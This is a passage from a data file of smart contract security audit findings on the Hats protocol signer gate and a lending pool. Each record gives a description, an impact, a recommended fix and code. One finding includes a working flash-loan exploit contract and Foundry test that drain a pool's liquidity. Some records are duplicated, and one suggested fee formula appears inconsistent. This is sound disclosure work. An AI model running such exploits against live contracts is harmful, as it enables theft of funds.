_owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n ""swapOwner(address,address,address)"",\\n _findPrevOwner(_owners, ownerToCheck), // prevOwner\\n ownerToCheck, // oldOwner\\n _signer // newOwner\\n );\\n\\n // execute the swap, reverting if it fails for some reason\\n success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecRemoveSigner();\\n }\\n\\n if (_currentSignerCount < _maxSigners) ++signerCount;\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nThis function is intended to iterate through all the owners, check if any is no longer valid, and — if that's the case — swap it for the new one.\\nHowever, in the case that all owners are valid except for the final one, it will miss the swap and reject the new owner.\\nThis is because there is an off by one error in the loop, where it iterates through `for (uint256 i; i < _ownerCount - 1;)...`\\nThis only iterates through all the owners up until the final one, and will miss the check for the validity and possible swap of the final owner.",Perform the loop with `ownerCount` instead of `ownerCount - 1` to check all owners:\\n```\\n// Remove the line below\\n for (uint256 i; i < _ownerCount // Remove the line below\\n 1;) {\\n// Add the line below\\n for (uint256 i; i < _ownerCount ;) {\\n ownerToCheck = _owners[i];\\n // rest of code\\n}\\n```\\n,"When only the final owner is invalid, new users will not be able to claim their role as signer, even through they should.","```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n" +"If a hat is owned by address(0), phony signatures will be accepted by the safe",medium,"If a hat is sent to `address(0)`, the multisig will be fooled into accepting phony signatures on its behalf. This will throw off the proper accounting of signatures, allowing non-majority transactions to pass and potentially allowing users to steal funds.\\nIn order to validate that all signers of a transaction are valid signers, `HatsSignerGateBase.sol` implements the `countValidSignatures()` function, which recovers the signer for each signature and checks `isValidSigner()` on them.\\nThe function uses `ecrecover` to get the signer. However, `ecrecover` is well known to return `address(0)` in the event that a phony signature is passed with a `v` value other than 27 or 28. See this example for how this can be done.\\nIn the event that this is a base with only a single hat approved for signing, the `isValidSigner()` function will simply check if the owner is the wearer of a hat:\\n```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n\\nOn the `Hats.sol` contract, this simply checks their balance:\\n```\\nfunction isWearerOfHat(address _user, uint256 _hatId) public view returns (bool isWearer) {\\n isWearer = (balanceOf(_user, _hatId) > 0);\\n}\\n```\\n\\n... which only checks if it is active or eligible...\\n```\\nfunction balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n{\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n}\\n```\\n\\n... which calls out to ERC1155, which just returns the value in storage (without any address(0) check)...\\n```\\nfunction balanceOf(address owner, uint256 id) public view virtual returns (uint256 balance) {\\n balance = _balanceOf[owner][id];\\n}\\n```\\n\\nThe result is that, if a hat ends up owned by `address(0)` for any reason, this will give blanket permission for anyone to create a phony signature that will be accepted by the safe.\\nYou could imagine a variety of situations where this may apply:\\nAn admin minting a mutable hat to address(0) to adjust the supply while waiting for a delegatee to send over their address to transfer the hat to\\nAn admin sending a hat to address(0) because there is some reason why they need the supply slightly inflated\\nAn admin accidentally sending a hat to address(0) to burn it\\nNone of these examples are extremely likely, but there would be no reason for the admin to think they were putting their multisig at risk for doing so. However, the result would be a free signer on the multisig, which would have dramatic consequences.",The easiest option is to add a check in `countValidSignatures()` that confirms that `currentOwner != address(0)` after each iteration.,"If a hat is sent to `address(0)`, any phony signature can be accepted by the safe, leading to transactions without sufficient support being executed.\\nThis is particularly dangerous in a 2/3 situation, where this issue would be sufficient for a single party to perform arbitrary transactions.","```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n" +"If signer gate is deployed to safe with more than 5 existing modules, safe will be bricked",medium,"`HatsSignerGate` can be deployed with a fresh safe or connected to an existing safe. In the event that it is connected to an existing safe, it pulls the first 5 modules from that safe to count the number of connected modules. If there are more than 5 modules, it silently only takes the first five. This results in a mismatch between the real number of modules and `enabledModuleCount`, which causes all future transactions to revert.\\nWhen a `HatsSignerGate` is deployed to an existing safe, it pulls the existing modules with the following code:\\n```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n\\nBecause the modules are requested paginated with `5` as the second argument, it will return a maximum of `5` modules. If the safe already has more than `5` modules, only the first `5` will be returned.\\nThe result is that, while the safe has more than 5 modules, the gate will be set up with `enabledModuleCount = 5 + 1`.\\nWhen a transaction is executed, `checkTransaction()` will get the hash of the first 6 modules:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter the transaction, the first 7 modules will be checked to compare it:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nSince it already had more than 5 modules (now 6, with HatsSignerGate added), there will be a 7th module and the two hashes will be different. This will cause a revert.\\nThis would be a high severity issue, except that in the comments for the function it says:\\n/// @dev Do not attach HatsSignerGate to a Safe with more than 5 existing modules; its signers will not be able to execute any transactions\\nThis is the correct recommendation, but given the substantial consequences of getting it wrong, it should be enforced in code so that a safe with more modules reverts, rather than merely suggested in the comments.","The `deployHatsSignerGate()` function should revert if attached to a safe with more than 5 modules:\\n```\\nfunction deployHatsSignerGate(\\n uint256 _ownerHatId,\\n uint256 _signersHatId,\\n address _safe, // existing Gnosis Safe that the signers will join\\n uint256 _minThreshold,\\n uint256 _targetThreshold,\\n uint256 _maxSigners\\n) public returns (address hsg) {\\n // count up the existing modules on the safe\\n (address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\n uint256 existingModuleCount = modules.length;\\n// Add the line below\\n (address[] memory modulesWithSix,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 6);\\n// Add the line below\\n if (modules.length != moduleWithSix.length) revert TooManyModules();\\n\\n return _deployHatsSignerGate(\\n _ownerHatId, _signersHatId, _safe, _minThreshold, _targetThreshold, _maxSigners, existingModuleCount\\n );\\n}\\n```\\n","If a HatsSignerGate is deployed and connected to a safe with more than 5 existing modules, all future transactions sent through that safe will revert.","```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n" +[Medium][Outdated State] `_removeSigner` incorrectly updates `signerCount` and safe `threshold`,medium,"`_removeSigner` can be called whenever a signer is no longer valid to remove an invalid signer. However, under certain situations, `removeSigner` incorrectly reduces the number of `signerCount` and sets the `threshold` incorrectly.\\n`_removeSigner` uses the code snippet below to decide if the number of `signerCount` should be reduced:\\n```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n\\nIf first clause is supposed to be activated when `validSignerCount` and `currentSignerCount` are still in sync, and we want to remove an invalid signer. The second clause is for when we need to identify a previously active signer which is inactive now and want to remove it. However, it does not take into account if a previously in-active signer became active. In the scenario described below, the `signerCount` would be updated incorrectly:\\n(1) Lets imagine there are 5 signers where 0, 1 and 2 are active while 3 and 4 are inactive, the current `signerCount = 3` (2) In case number 3 regains its hat, it will become active again (3) If we want to delete signer 4 from the owners' list, the `_removeSigner` function will go through the signers and find 4 valid signers, since there were previously 3 signers, `validSignerCount == currentSignerCount` would be false. (4) In this case, while the number of `validSingerCount` increased, the `_removeSigner` reduces one.",Check if the number of `validSignerCount` decreased instead of checking equality:\\n```\\n@line 387 HatsSignerGateBase\\n- if (validSignerCount == currentSignerCount) {\\n+ if (validSignerCount >= currentSignerCount) {\\n```\\n,"This can make the `signerCount` and safe `threshold` to update incorrectly which can cause further problems, such as incorrect number of signatures needed.",```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n +The Hats contract needs to override the ERC1155.balanceOfBatch function,medium,"The Hats contract does not override the ERC1155.balanceOfBatch function\\nThe Hats contract overrides the ERC1155.balanceOf function to return a balance of 0 when the hat is inactive or the wearer is ineligible.\\n```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n\\nBut the Hats contract does not override the ERC1155.balanceOfBatch function, which causes balanceOfBatch to return the actual balance no matter what the circumstances.\\n```\\n function balanceOfBatch(address[] calldata owners, uint256[] calldata ids)\\n public\\n view\\n virtual\\n returns (uint256[] memory balances)\\n {\\n require(owners.length == ids.length, ""LENGTH_MISMATCH"");\\n\\n balances = new uint256[](owners.length);\\n\\n // Unchecked because the only math done is incrementing\\n // the array index counter which cannot possibly overflow.\\n unchecked {\\n for (uint256 i = 0; i < owners.length; ++i) {\\n balances[i] = _balanceOf[owners[i]][ids[i]];\\n }\\n }\\n }\\n```\\n",Consider overriding the ERC1155.balanceOfBatch function in Hats contract to return 0 when the hat is inactive or the wearer is ineligible.,"This will make balanceOfBatch return a different result than balanceOf, which may cause errors when integrating with other projects","```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n" +Unbound recursive function call can use unlimited gas and break hats operation,medium,"some of the functions in the Hats and HatsIdUtilities contracts has recursive logics without limiting the number of iteration, this can cause unlimited gas usage if hat trees has huge depth and it won't be possible to call the contracts functions. functions `getImageURIForHat()`, `isAdminOfHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` would revert and because most of the logics callings those functions so contract would be in broken state for those hats.\\nThis is function `isAdminOfHat()` code:\\n```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n\\nAs you can see this function calls itself recursively to check that if user is wearer of the one of the upper link hats of the hat or not. if the chain(depth) of the hats in the tree become very long then this function would revert because of the gas usage and the gas usage would be high enough so it won't be possible to call this function in a transaction. functions `getImageURIForHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` has similar issues and the gas usage is depend on the tree depth. the issue can happen suddenly for hats if the top level topHat decide to add link, for example:\\nHat1 is linked to chain of the hats that has 1000 ""root hat"" and the topHat (tippy hat) is TIPHat1.\\nHat2 is linked to chain of the hats that has 1000 ""root hat"" and the topHat (tippy hat) is TIPHat2.\\nadmin of the TIPHat1 decides to link it to the Hat2 and all and after performing that the total depth of the tree would increase to 2000 and transactions would cost double time gas.",code should check and make sure that hat levels has a maximum level and doesn't allow actions when this level breaches. (keep depth of each tophat's tree and update it when actions happens and won't allow actions if they increase depth higher than the threshold),it won't be possible to perform actions for those hats and funds can be lost because of it.,"```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n" +Owners can be swapped even though they still wear their signer hats,medium,"`HatsSignerGateBase` does not check for a change of owners post-flight. This allows a group of actors to collude and replace opposing signers with cooperating signers, even though the replaced signers still wear their signer hats.\\nThe `HatsSignerGateBase` performs various checks to prevent a multisig transaction to tamper with certain variables. Something that is currently not checked for in `checkAfterExecution` is a change of owners. A colluding group of malicious signers could abuse this to perform swaps of safe owners by using a delegate call to a corresponding malicious contract. This would bypass the requirement of only being able to replace an owner if he does not wear his signer hat anymore as used in _swapSigner:\\n```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n ""swapOwner(address,address,address)"",\\n // rest of code\\n```\\n","Perform a pre- and post-flight comparison on the safe owners, analogous to what is currently done with the modules.",bypass restrictions and perform action that should be disallowed.,"```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n ""swapOwner(address,address,address)"",\\n // rest of code\\n```\\n" +Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold,high,"The safe's threshold is supposed to be set with the lower value of the `validSignerCount` and the `targetThreshold` (intended to serve as the maximum). However, the wrong value is used in the call to the safe's function, which in some circumstances can lead to the safe being permanently bricked.\\nIn `reconcileSignerCount()`, the valid signer count is calculated. We then create a value called `newThreshold`, and set it to the minimum of the valid signer count and the target threshold. This is intended to be the value that we update the safe's threshold with.\\n```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n\\nHowever, there is a typo in the contract call, which accidentally uses `validSignerCount` instead of `newThreshold`.\\nThe result is that, if there are more valid signers than the `targetThreshold` that was set, the threshold will be set higher than intended, and the threshold check in `checkAfterExecution()` will fail for being above the max, causing all safe transactions to revert.\\nThis is a major problem because it cannot necessarily be fixed. In the event that it is a gate with a single hat signer, and the eligibility module for the hat doesn't have a way to turn off eligibility, there will be no way to reduce the number of signers. If this number is greater than `maxSigners`, there is no way to increase `targetThreshold` sufficiently to stop the reverting.\\nThe result is that the safe is permanently bricked, and will not be able to perform any transactions.","Issue Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold\\nChange the value in the function call from `validSignerCount` to `newThreshold`.\\n```\\nif (newThreshold > 0) {\\n// Remove the line below\\n bytes memory data = abi.encodeWithSignature(""changeThreshold(uint256)"", validSignerCount);\\n// Add the line below\\n bytes memory data = abi.encodeWithSignature(""changeThreshold(uint256)"", newThreshold);\\n\\n bool success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecChangeThreshold();\\n }\\n}\\n```\\n","All transactions will revert until `validSignerCount` can be reduced back below `targetThreshold`, which re",```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n +Changing hat toggle address can lead to unexpected changes in status,medium,"Changing the toggle address should not change the current status unless intended to. However, in the event that a contract's toggle status hasn't been synced to local state, this change can accidentally toggle the hat back on when it isn't intended.\\nWhen an admin for a hat calls `changeHatToggle()`, the `toggle` address is updated to a new address they entered:\\n```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n\\nToggle addresses can be either EOAs (who must call `setHatStatus()` to change the local config) or contracts (who must implement the `getHatStatus()` function and return the value).\\nThe challenge comes if a hat has a toggle address that is a contract. The contract changes its toggle value to `false` but is never checked (which would push the update to the local state). The admin thus expects that the hat is turned off.\\nThen, the toggle is changed to an EOA. One would expect that, until a change is made, the hat would remain in the same state, but in this case, the hat defaults back to its local storage state, which has not yet been updated and is therefore set to `true`.\\nEven in the event that the admin knows this and tries to immediately toggle the status back to `false`, it is possible for a malicious user to sandwich their transaction between the change to the EOA and the transaction to toggle the hat off, making use of a hat that should be off. This could have dramatic consequences when hats are used for purposes such as multisig signing.","The `changeHatToggle()` function needs to call `checkHatToggle()` before changing over to the new toggle address, to ensure that the latest status is synced up.","Hats may unexpectedly be toggled from `off` to `on` during toggle address transfer, reactivating hats that are intended to be turned `off`.","```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n" +Changing hat toggle address can lead to unexpected changes in status,medium,"Changing the toggle address should not change the current status unless intended to. However, in the event that a contract's toggle status hasn't been synced to local state, this change can accidentally toggle the hat back on when it isn't intended.\\nWhen an admin for a hat calls `changeHatToggle()`, the `toggle` address is updated to a new address they entered:\\n```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n\\nToggle addresses can be either EOAs (who must call `setHatStatus()` to change the local config) or contracts (who must implement the `getHatStatus()` function and return the value).\\nThe challenge comes if a hat has a toggle address that is a contract. The contract changes its toggle value to `false` but is never checked (which would push the update to the local state). The admin thus expects that the hat is turned off.\\nThen, the toggle is changed to an EOA. One would expect that, until a change is made, the hat would remain in the same state, but in this case, the hat defaults back to its local storage state, which has not yet been updated and is therefore set to `true`.\\nEven in the event that the admin knows this and tries to immediately toggle the status back to `false`, it is possible for a malicious user to sandwich their transaction between the change to the EOA and the transaction to toggle the hat off, making use of a hat that should be off. This could have dramatic consequences when hats are used for purposes such as multisig signing.","The `changeHatToggle()` function needs to call `checkHatToggle()` before changing over to the new toggle address, to ensure that the latest status is synced up.","Hats may unexpectedly be toggled from `off` to `on` during toggle address transfer, reactivating hats that are intended to be turned `off`.","```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n" +Precision differences when calculating userCollateralRatioMantissa causes major issues for some token pairs,high,"When calculating userCollateralRatioMantissa in borrow and liquidate. It divides the raw debt value (in loan token precision) by the raw collateral balance (in collateral precision). This skew is fine for a majority of tokens but will cause issues with specific token pairs, including being unable to liquidate a subset of positions no matter what.\\nWhen calculating userCollateralRatioMantissa, both debt value and collateral values are left in the native precision. As a result of this certain token pairs will be completely broken because of this. Other pairs will only be partially broken and can enter state in which it's impossible to liquidate positions.\\nImagine a token pair like USDC and SHIB. USDC has a token precision of 6 and SHIB has 18. If the user has a collateral balance of 100,001 SHIB (100,001e18) and a loan borrow of 1 USDC (1e6) then their userCollateralRatioMantissa will actually calculate as zero:\\n```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n\\nThere are two issues with this. First is that a majority of these tokens simply won't work. The other issue is that because userCollateralRatioMantissa returns 0 there are states in which some debt is impossible to liquidate breaking a key invariant of the protocol.\\nAny token with very high or very low precision will suffer from this.",userCollateralRatioMantissa should be calculated using debt and collateral values normalized to 18 decimal points,Some token pairs will always be/will become broken,"```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n" +Fee share calculation is incorrect,medium,"Fees are given to the feeRecipient by minting them shares. The current share calculation is incorrect and always mints too many shares the fee recipient, giving them more fees than they should get.\\nThe current equation is incorrect and will give too many shares, which is demonstrated in the example below.\\nExample:\\n```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n\\nCalculate the fee with the current equation:\\n```\\n_accuredFeeShares = fee * _totalSupply / supplied = 2 * 100 / 100 = 2\\n```\\n\\nThis yields 2 shares. Next calculate the value of the new shares:\\n```\\n2 * 110 / 102 = 2.156\\n```\\n\\nThe value of these shares yields a larger than expected fee. Using a revised equation gives the correct amount of fees:\\n```\\n_accuredFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee) = 2 * 100 / (100 + 10 - 2) = 1.852\\n\\n1.852 * 110 / 101.852 = 2\\n```\\n\\nThis new equation yields the proper fee of 2.","Issue Fee share calculation is incorrect\\nUse the modified equation shown above:\\n```\\n uint fee = _interest * _feeMantissa / 1e18;\\n // 13. Calculate the accrued fee shares\\n- _accruedFeeShares = fee * _totalSupply / _supplied; // if supplied is 0, we will have returned at step 7\\n+ _accruedFeeShares = fee * (_totalSupply * fee) / (_supplied + _interest - fee); // if supplied is 0, we will have returned at step 7\\n // 14. Update the total supply\\n _currentTotalSupply += _accruedFeeShares;\\n```\\n","Fee recipient is given more fees than intended, which results in less interest for LPs",```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n +Users can borrow all loan tokens,medium,"Utilization rate check can be bypassed depositing additional loan tokens and withdrawing them in the same transaction.\\nIn the `borrow` function it is checked that the new utilization ratio will not be higher than the surge threshold. This threshold prevents borrowers from draining all available liquidity from the pool and also trigger the surge state, which lowers the collateral ratio.\\nA user can bypass this and borrow all available loan tokens following these steps:\\nDepositing the required amount of loan tokens in order to increase the balance of the pool.\\nBorrow the remaining loan tokens from the pool.\\nWithdraw the loan tokens deposited in the first step.\\nThis can be done in one transaction and the result will be a utilization rate of 100%. Even if the liquidity of the pool is high, the required loan tokens to perform the strategy can be borrowed using a flash loan.\\nHelper contract:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from ""./FlashLoan.sol"";\\nimport { Pool } from ""./../../src/Pool.sol"";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n\\nExecution:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../src/Pool.sol"";\\nimport ""../src/Factory.sol"";\\nimport ""./mocks/Borrower.sol"";\\nimport ""./mocks/ERC20.sol"";\\n\\ncontract PoC is Test {\\n address alice = vm.addr(0x1);\\n address bob = vm.addr(0x2);\\n Factory factory;\\n Pool pool;\\n Borrower borrower;\\n Flashloan flashLoan;\\n MockERC20 collateralToken;\\n MockERC20 loanToken;\\n uint maxCollateralRatioMantissa;\\n uint surgeMantissa;\\n uint collateralRatioFallDuration;\\n uint collateralRatioRecoveryDuration;\\n uint minRateMantissa;\\n uint surgeRateMantissa;\\n uint maxRateMantissa;\\n\\n function setUp() public {\\n factory = new Factory(address(this), ""G"");\\n flashLoan = new Flashloan();\\n collateralToken = new MockERC20(1 ether, 18);\\n collateralToken.transfer(bob, 1 ether);\\n loanToken = new MockERC20(100 ether, 18);\\n loanToken.transfer(alice, 1 ether);\\n loanToken.transfer(address(flashLoan), 99 ether);\\n maxCollateralRatioMantissa = 1e18;\\n surgeMantissa = 0.8e18; // 80%\\n pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), maxCollateralRatioMantissa, surgeMantissa, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n }\\n\\n function testFailBorrowAll() external {\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n pool.addCollateral(bob, 1 ether);\\n pool.borrow(1 ether);\\n vm.stopPrank();\\n }\\n\\n function testBypassUtilizationRate() external {\\n uint balanceBefore = loanToken.balanceOf(bob);\\n\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n borrower = new Borrower(flashLoan, pool);\\n pool.addCollateral(address(borrower), 1 ether);\\n borrower.borrowAll();\\n vm.stopPrank();\\n\\n assertEq(loanToken.balanceOf(bob) - balanceBefore, 1 ether);\\n }\\n}\\n```\\n",A possible solution would be adding a locking period for deposits of loan tokens.\\nAnother possibility is to enforce that the utilization rate was under the surge rate also in the previous snapshot.,"The 